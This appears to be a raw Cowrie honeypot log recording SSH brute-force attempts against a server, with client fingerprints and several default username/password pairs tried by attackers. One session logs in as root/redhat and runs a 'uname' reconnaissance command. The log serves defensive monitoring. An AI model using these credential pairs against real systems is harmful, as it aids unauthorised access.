istp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:22:31.561283Z","src_ip":"83.168.105.65","session":"cad1aa5787c3"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-26T11:22:31.675747Z","src_ip":"83.168.105.65","session":"cad1aa5787c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56002,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc8dfd965d41","protocol":"ssh","message":"New connection: 212.227.125.160:56002 (1.2.3.4:22) [session: cc8dfd965d41]","sensor":"my-vps","timestamp":"2025-08-26T11:22:32.673524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:22:32.674509Z","src_ip":"212.227.125.160","session":"cc8dfd965d41"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:32.713552Z","src_ip":"83.168.105.65","session":"cad1aa5787c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:22:32.800565Z","src_ip":"212.227.125.160","session":"cc8dfd965d41"}
{"eventid":"cowrie.login.success","username":"root","password":"redhat","message":"login attempt [root/redhat] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:22:32.956764Z","src_ip":"212.227.125.160","session":"cc8dfd965d41"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:22:33.145202Z","src_ip":"212.227.125.160","session":"cc8dfd965d41"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:22:33.146008Z","src_ip":"212.227.125.160","session":"cc8dfd965d41"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:33.213310Z","src_ip":"212.227.125.160","session":"cc8dfd965d41"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:33.214396Z","src_ip":"212.227.125.160","session":"cc8dfd965d41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56772,"dst_ip":"1.2.3.4","dst_port":22,"session":"220dc86a4d0e","protocol":"ssh","message":"New connection: 212.227.125.160:56772 (1.2.3.4:22) [session: 220dc86a4d0e]","sensor":"my-vps","timestamp":"2025-08-26T11:22:38.506728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:22:38.508674Z","src_ip":"212.227.125.160","session":"220dc86a4d0e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:22:38.556934Z","src_ip":"212.227.125.160","session":"220dc86a4d0e"}
{"eventid":"cowrie.login.failed","username":"devadmin","password":"devadmin","message":"login attempt [devadmin/devadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:22:39.052401Z","src_ip":"212.227.125.160","session":"220dc86a4d0e"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":33622,"dst_ip":"1.2.3.4","dst_port":22,"session":"447198d1a638","protocol":"ssh","message":"New connection: 196.251.86.249:33622 (1.2.3.4:22) [session: 447198d1a638]","sensor":"my-vps","timestamp":"2025-08-26T11:22:39.229082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:22:39.786975Z","src_ip":"196.251.86.249","session":"447198d1a638"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:22:39.788158Z","src_ip":"196.251.86.249","session":"447198d1a638"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:40.105374Z","src_ip":"212.227.125.160","session":"220dc86a4d0e"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"password123","message":"login attempt [hadoop/password123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:22:42.172933Z","src_ip":"196.251.86.249","session":"447198d1a638"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:43.951356Z","src_ip":"196.251.86.249","session":"447198d1a638"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57538,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa4a6907fa89","protocol":"ssh","message":"New connection: 212.227.125.160:57538 (1.2.3.4:22) [session: fa4a6907fa89]","sensor":"my-vps","timestamp":"2025-08-26T11:22:44.202279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:22:44.282092Z","src_ip":"212.227.125.160","session":"fa4a6907fa89"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:22:44.283525Z","src_ip":"212.227.125.160","session":"fa4a6907fa89"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:22:44.492024Z","src_ip":"212.227.125.160","session":"fa4a6907fa89"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:45.543721Z","src_ip":"212.227.125.160","session":"fa4a6907fa89"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":50494,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ca6fd7fda51","protocol":"ssh","message":"New connection: 83.168.105.65:50494 (1.2.3.4:22) [session: 7ca6fd7fda51]","sensor":"my-vps","timestamp":"2025-08-26T11:22:47.332218Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:22:47.332973Z","src_ip":"83.168.105.65","session":"7ca6fd7fda51"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:22:47.372568Z","src_ip":"83.168.105.65","session":"7ca6fd7fda51"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"123456","message":"login attempt [mongo/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:22:47.493347Z","src_ip":"83.168.105.65","session":"7ca6fd7fda51"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:48.535194Z","src_ip":"83.168.105.65","session":"7ca6fd7fda51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58306,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9fc064ecf66","protocol":"ssh","message":"New connection: 212.227.125.160:58306 (1.2.3.4:22) [session: f9fc064ecf66]","sensor":"my-vps","timestamp":"2025-08-26T11:22:49.205912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:22:49.224210Z","src_ip":"212.227.125.160","session":"f9fc064ecf66"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:22:49.257887Z","src_ip":"212.227.125.160","session":"f9fc064ecf66"}
{"eventid":"cowrie.login.failed","username":"amavis","password":"amavis","message":"login attempt [amavis/amavis] failed","sensor":"my-vps","timestamp":"2025-08-26T11:22:49.467652Z","src_ip":"212.227.125.160","session":"f9fc064ecf66"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:50.526825Z","src_ip":"212.227.125.160","session":"f9fc064ecf66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59086,"dst_ip":"1.2.3.4","dst_port":22,"session":"57a6c8f89fd0","protocol":"ssh","message":"New connection: 212.227.125.160:59086 (1.2.3.4:22) [session: 57a6c8f89fd0]","sensor":"my-vps","timestamp":"2025-08-26T11:22:54.838372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:22:54.839105Z","src_ip":"212.227.125.160","session":"57a6c8f89fd0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:22:54.890142Z","src_ip":"212.227.125.160","session":"57a6c8f89fd0"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-08-26T11:22:55.045436Z","src_ip":"212.227.125.160","session":"57a6c8f89fd0"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:56.496069Z","src_ip":"212.227.125.160","session":"57a6c8f89fd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59858,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b08a60909b7","protocol":"ssh","message":"New connection: 212.227.125.160:59858 (1.2.3.4:22) [session: 9b08a60909b7]","sensor":"my-vps","timestamp":"2025-08-26T11:23:00.303786Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:00.305628Z","src_ip":"212.227.125.160","session":"9b08a60909b7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:23:00.359227Z","src_ip":"212.227.125.160","session":"9b08a60909b7"}
{"eventid":"cowrie.login.failed","username":"webuzo","password":"webuzo","message":"login attempt [webuzo/webuzo] failed","sensor":"my-vps","timestamp":"2025-08-26T11:23:00.511398Z","src_ip":"212.227.125.160","session":"9b08a60909b7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:01.594596Z","src_ip":"212.227.125.160","session":"9b08a60909b7"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":49000,"dst_ip":"1.2.3.4","dst_port":22,"session":"4db725fc0415","protocol":"ssh","message":"New connection: 83.168.105.65:49000 (1.2.3.4:22) [session: 4db725fc0415]","sensor":"my-vps","timestamp":"2025-08-26T11:23:03.000951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:03.002013Z","src_ip":"83.168.105.65","session":"4db725fc0415"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:23:03.039247Z","src_ip":"83.168.105.65","session":"4db725fc0415"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T11:23:03.153807Z","src_ip":"83.168.105.65","session":"4db725fc0415"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:23:04.193034Z","src_ip":"83.168.105.65","session":"4db725fc0415"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60628,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fef00f060f2","protocol":"ssh","message":"New connection: 212.227.125.160:60628 (1.2.3.4:22) [session: 1fef00f060f2]","sensor":"my-vps","timestamp":"2025-08-26T11:23:05.782945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:23:05.840941Z","src_ip":"212.227.125.160","session":"1fef00f060f2"}
